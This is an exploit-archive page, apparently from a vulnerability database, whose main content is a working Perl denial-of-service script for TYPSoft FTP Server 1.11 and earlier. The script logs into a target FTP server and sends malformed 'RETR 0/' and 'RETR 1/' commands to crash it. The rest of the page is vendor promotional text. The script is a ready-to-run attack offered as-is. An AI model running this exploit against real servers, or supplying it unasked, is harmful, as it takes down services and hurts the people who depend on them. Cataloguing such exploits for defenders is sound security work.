Lucene search
+L

TYPSoft FTP Server <= 1.11 (RETR) Denial of Service Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 21 Views

TYPSoft FTP Server v1.11 Denial of Servic

Code

                                                #!/usr/bin/perl

use IO::Socket;
use Socket;

print &#34;\n-= TYPSoft FTP Server &#60;= v1.11 DOS =-\n&#34;;
print &#34;-= wood (at) Exploitlabs.com =-\n\n&#34;;

if($#ARGV &#60; 2 | $#ARGV &#62; 3) { die &#34;usage: perl typsoft-1.11-DOS.pl &#60;host&#62; &#60;user&#62; &#60;pass&#62; [port]\n&#34; };
if($#ARGV &#62; 2) { $prt = $ARGV[3] } else { $prt = &#34;21&#34; };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = &#34;RETR 0&#34;;
$err2 = &#34;RETR 1&#34;;


$remote = IO::Socket::INET-&#62;new(Proto=&#62;&#34;tcp&#34;, PeerAddr=&#62;$adr,
PeerPort=&#62;$prt, Reuse=&#62;1) or die &#34;Error: cant connect to $adr:$prt\n&#34;;

$remote-&#62;autoflush(1);

print $remote &#34;USER $usr\n&#34; and print &#34;1. Sending : USER $usr...\n&#34; or die
&#34;Error: cant send user\n&#34;;

print $remote &#34;PASS $pas\n&#34; and print &#34;2. Sending : PASS $pas...\n&#34; or die
&#34;Error: cant send pass\n&#34;;

print $remote &#34;$err1/\n&#34; and print &#34;3. Sending : ErrorCode 1...\n&#34;;
print $remote &#34;$err2/\n&#34; and print &#34;4. Sending : ErrorCode 2...\n\n&#34;or die 
&#34;Error: cant send error code\n&#34;;

print &#34;Attack done. press any key to exit\n&#34;;
$bla= &#60;STDIN&#62;;
close $remote; 

# milw0rm.com [2005-10-14]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
21